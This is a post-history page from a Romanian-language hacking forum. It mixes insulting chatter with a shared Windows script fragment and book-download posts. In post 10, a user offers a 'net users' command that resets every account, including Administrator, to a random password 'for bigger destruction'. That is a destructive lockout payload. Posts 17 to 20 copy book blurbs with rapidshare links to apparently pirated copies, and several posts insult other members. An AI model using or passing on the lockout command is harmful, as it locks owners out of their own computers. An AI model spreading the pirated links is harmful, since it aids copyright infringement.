Jump to content

mihnutzu

Members
  • Posts

    41
  • Joined

  • Last visited

    Never

Everything posted by mihnutzu

  1. De unde ideea asta cu 23 milioane suporteri ... poate 23 de suporteri
  2. Pentru programe intrati fratilor pe www.phazeddl.com |||| aici e forum de hacking
  3. cein esti handicapat rau ! dai copy paste pana si la raspunsurile astea de 2 lei ? Dati-i ban looser-ului asta .
  4. Mai ramane sa faci un post : Cum sa iti faci singur un user de yahoo in doar 5 minute . Sau cum sa iti instalezi windowsul fara sa il chemi pe vecinu de la 3.
  5. nos esti mai praf ca prafu' de pe cartile din biblioteca ta .
  6. da nu poti sa dai save image sau e prea greu pentru voi ?
  7. Hai ca am auzit-o si pe asta ... click dreapta Copy Image Location si gata
  8. Intel Core 2 Duo E6600 2.40 GHz
  9. lol pai tu dai restart ? nu te supara dar esti cam paralel .
  10. Varianta pusa de ingerica face un log in C:WINDOWSlog.txt cu parola. Scriptul de mai sus nu. PS: Pentru distrugeri mia mari adaugati : killer.Run("net users "Administrator" "+rand_pass); sub : killer.Run("net users "+userArr+" "+rand_pass);
  11. Nu. E de pe softpedia si avea credit.
  12. Kw3[R]Ln baga si tu in postul lui ingerica un credit pt mine pls , ca el nu cred ca are de gand. Mc anticipat.
  13. E pe un CD ... o caut imediat!
  14. PROGRAMU ASTA E FACUT de mine plagiatorule !!!! Pune o parola aleatoare , din cifre .
  15. bai una e sa hackuiesti pagini si alta e sa furi de la oameni ... vreti sa fiti hackeri sau crackeri ?
  16. mihnutzu

    Salut

    Na ca fac si eu un mesaj aiurea ca cei dinaintea mea . Oricum salut !
  17. Want to calculate the probability that an event will happen? Be able to spot fake data? Prove beyond doubt whether one thing causes another? Or learn to be a better gambler? You can do that and much more with 75 practical and fun hacks packed into Statistics Hacks. These cool tips tricks, and mind-boggling solutions from the world of statistics measurement, and research methods will not only amaze and entertain you but will give you an advantage in several real-world situations-including This book is ideal for anyone who likes puzzles, brainteasers, games gambling, magic tricks, and those who want to apply math and science to everyday circumstances. Several hacks in the first chapter alone-such as the "central limit theorem,", which allows you to know everything by knowing just a little-serve as sound approaches for marketing and other business objectives. Using the tools of inferential statistics, you can understand the way probability works, discover relationships, predict events with uncanny accuracy, and even make a little money with a Statistics Hacks presents useful techniques from statistics, educational and psychological measurement, and experimental research to help you solve a variety of problems in business, games, and life. You'll learn Play smart when you play Texas Hold 'Em, blackjack, roulette, dice Predict the outcomes of baseball games, know when to "go for two" in football, and anticipate the winners of other sporting events with Demystify amazing coincidences and distinguish the truly random from Spot fraudulent data, detect plagiarism, and break codes How to isolate the effects of observation on the thing observed Whether you're a statistics enthusiast who does calculations in your sleep or a civilian who is entertained by clever solutions to interesting problems, Statistics Hacks has tools to give you an edge over the world's slim odds DOWNLOAD : http://rapidshare.de/files/29027232/OReill...y.2006.chm.html
  18. Windows XP is a great operating system. It is faster and more secure than any other version of Windows. However, for some, it is not fast and secure enough. By picking up this book, you have started a three-part journey that will guide you through all of the steps of customizing, optimizing for performance, and securing Windows XP. I am not talking about minor little tweaks; this book is going to show you how to conduct major surgery on your Windows XP box Visually, Windows XP is superior to all other Windows versions. No other version of Windows has ever looked this good So how could you make it look better? Customize it! Impress your friends and refresh your dull desktop with a cool new look. I am going to show you how to completely change the way Windows XP looks during all stages of its operation Performance-wise, Windows XP has made great advances. However, for some computer users of older hardware, running Windows XP can be like trying to pull a 100-foot yacht behind a tiny import car. Although Windows XP will not bust your CPU quite so much as a yacht would, it can slow down the operation of your computer because there are so many new features. To help you out, I am going to show you how to get the new features under control; I'll also tell you about some tricks that I have found to speed up the operation of Windows XP. If you already have the V12 4 x 4 of computers, and you have no problem pulling the 100-foot yacht, then you will still benefit from the performance tips Windows XP is a lot more secure than prior Windows operating systems. However, as we all know from recent history it has not been doing very well. This book is going to show you how to use some of the new features of Windows XP Service Pack 2, as well as many other cool security tips, to make Windows XP much securer. Congratulations on starting your journey. Your computer will be in better shape than ever in no time! DOWNLOAD : http://rapidshare.de/files/29026914/Guide_..._winxp.rar.html
  19. In a section on choosing WiFi access points, the authors give a very explicit list of requirements (the ability to disable service-set identifier broadcasts, 128-bit Wired Equivalent Protocol--WEP--and so on), and list at least three real products (by make and model) that fit the specifications. They then proceed to show how to choose the most secure configuration options on each of the featured products, including the Cisco Systems Aironet and the Agere ORiNOCO. Configuration instructions are easy to follow and illustrated in detail. Information on the offensive side of the equation is shallower--the authors point out that it's possible to drive around, looking for unsecured wireless access points and that WEP has security flaws. Still, this book is one of the first on security for wireless networks, and it provides a lot of good information to the administrators of such networks. --David Wall Topics covered: The special security characteristics of wireless networks (primarily including, but not limited to, those operating under the IEEE 802.11 standards) and some recommended procedures for the administrators of such networks. Wired Equivalent Protocol (WEP), MAC filtering, and virtual private networks (VPNs) tailored for use in wireless environments get particularly admirable coverage. Book Description This is the only book written specifically for architects, engineers, and administrators responsible for securing their wireless networks. From making sense of the various acronyms (WAP, WEP, SSL, PKE, PKI, SSL, SSH, IPSEC) to implementing security policies, plans, and recovery protocols, this book helps users secure their wireless network before its security is compromised. DOWNLOAD : http://rapidshare.de/files/29024026/eBook_...etwork.pdf.html
  20. If you're a programmer--or even just familiar with a HTML or a scripting language--Google opens up even further. A large part of Google Hacks concerns itself with the Google API (the collection of capabilities that Google exposes for use by software) and other programmers' resources. For example, the authors include a simple Perl application that queries the Google engine with terms specified by the user. They also document XooMLe, which delivers Google results in XML form. In brief, this is the best compendium of Google's lesser-known capabilities available anywhere, including the Google site itself. --David Wall Topics covered: How to get the most from the Google search engine by using its Web-accessible features (including product searches, image searches, news searches, and newsgroup searches) and the large collection of desktop-resident toolbars available, as well as its advanced search syntax. Other sections have to do with programming with the Google API and simple "scrapes" of results pages, while further coverage addresses how to get your Web page to feature prominently in Google keyword searches. --This text refers to an out of print or unavailable edition of this title. Book Description Whether you're a high school student looking for the latest info on your favorite rock group, or a seasoned attorney researching an old case, you're probably using Google. It seems like everyone is. And who can blame them? With access to more than three million documents in over 30 languages, Google is a researcher's dream. It's no wonder, then, that nearly 150 million Google searches are conducted each day. As a result, people are hungry to learn new ways to maximize its usefulness. Truth is, there are dozens upon dozens of techniques to learn--each designed to make your Google search more time-efficient, more productive, and more fun. And Google Hacks, Second Edition has the inside scoop on them all. An absolute must-have guide for anyone who searches the Internet--and these days that's just about everybody--Google Hacks, Second Edition takes its best-selling predecessor one step further. In plain language, Google Hacks, Second Edition is an updated collection of industrial-strength, real-world tested solutions to practical research problems. Best of all, each of its 100 hacks are easy to read and digest--no confusing terminology or extraneous information to hamper your understanding. And although they can be read in just a few short minutes, when put to use, they can easily save you hours of research time. Now that's bang for your buck! DOWNLOAD : http://rapidshare.de/files/29021820/OReill...on2003.pdf.html
×
×
  • Create New...